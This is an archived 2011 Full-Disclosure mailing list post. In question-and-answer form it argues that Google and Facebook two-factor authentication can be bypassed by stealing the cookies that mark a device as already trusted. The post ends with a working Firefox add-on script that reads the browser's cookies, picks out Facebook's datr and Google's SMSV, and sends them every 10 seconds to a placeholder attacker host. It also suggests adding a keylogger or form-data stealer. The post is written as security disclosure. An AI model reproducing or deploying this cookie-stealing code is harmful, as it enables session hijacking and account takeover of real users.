lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000001cc17ce$ee57b910$cb072b30$@net>
Date: Sat, 21 May 2011 17:51:20 +0200
From: "Z" <Z@...hall.net>
To: <full-disclosure@...ts.grok.org.uk>
Subject: (Google && Facebook) X factor authentication. Is
	X enough to sit back and relax?

Google and Facebook have recently added 2 factor authentication to their
services. 

Great news, so am I protected now?
There are many type of attacks and attackers. Some forms of attacks are
defeated by this 2 factor authentication (shoulder surfing, hardware
keylogging, network MITM), other types of attacks defeat these 2 factor
authentication protection, e.g. malwares, malicious browser extensions. 

Why are some attacks useless and why is malware still effective against
these 2 factor authentications?
Back to the basics: after logging in how can the server know that you are
the authenticated user? There is only 1 thing what really matters: session
cookies.

I see, but who has access to my session cookies?
Every program running in the same user context on the machine. This is the
browser, browser addons, a malware running on the computer, an attacker
having an interactive shell on your computer, etc.

Is the session cookie stolable/clonable?
Yes, it is a plain text file.

Which cookies do I have to protect? 
On facebook, the datr cookie is responsible to "skip" the second factor on
"known" computers.
On gmail/google, the SMSV cookie is responsible to "skip" the second factor
on "known" computers.
Even if the attacker is from different country, using different browser, it
does not matter. If the cookies are expired, first try to set the expirity
date to the future, it's not tested if it will work.

And what can the attacker do if he steals these cookies?
The attacker can simply insert these cookies into his browser, and login
with 1 factor defeated.

What if someone is so paranoid that he always uses the 2 factor auth?
The current session could be still stolen by the attacker. Otherwise one has
to infect the mobile device, clone google authenticator or forward the sent
sms-s to another mobile device (for proof search for Zitmo). Since google
authenticator is a soft token, it is cloneable. 

Is it your idea to steal session cookies?
No, but this field is kinda under-educated/under-valued.

And how can the attacker steal the user password?
Append a keystroke logger or a postdata stealer to this POC. There are
examples here: www.jfgit.com

But I'm using Linux/UNIX/BSD/Solaris/OSX/Win7, am I still vulnerable?
Yes.

But google and facebook are using httponly and secure flags on the cookies.
Am I still vulnerable?
Yes.

Any recommendations?
A "Restrict session to ip" option can help in the case if the attacker can't
forward requests through the victim's computer. But basically, no, there is
no help. 

Who are you?
Z

I don't believe this, prove it!
Firefox POC addon will catch Google and Facebook password and steal the
important cookies, and send the actual cookie value every 10 seconds to the
attacker 127.0.0.1


############################################################################
#############################
//Z
host = 'http://127.0.0.1/';
interval = 10;

gcookie = "";
fbcookie = "";

var event = {
    observe: function (subject, topic, data) {
        var cookieMgr =
Components.classes["@mozilla.org/cookiemanager;1"].getService(Components.int
erfaces.nsICookieManager);
        for (var e = cookieMgr.enumerator; e.hasMoreElements();) {

            var cookie =
e.getNext().QueryInterface(Components.interfaces.nsICookie);

            cookie_str = "host:" + cookie.host + " name:" + cookie.name + "
value:" + cookie.value + " expires:" + cookie.expires + " path:" +
cookie.path + " isSecure:" + cookie.isSecure + " policy:" + cookie.policy +
" isDomain:" + cookie.isDomain + " status:" + cookie.status + "\n";
			
            if (cookie.name == "SMSV") {
                gcookie = cookie_str;
            }
            if (cookie.name == "datr") {
                fbcookie = cookie_str;
            }
        }

        http = new XMLHttpRequest();
        http.open("GET", host + "?" + fbcookie + " " + gcookie, true);
        http.send();
        
		gcookie = "";
		fbcookie = "";

    }
}
var timer =
Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfa
ces.nsITimer);
const TYPE_REPEATING_PRECISE =
Components.interfaces.nsITimer.TYPE_REPEATING_PRECISE;

timer.init(event, interval * 1000, TYPE_REPEATING_PRECISE);

############################################################################
#############################


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ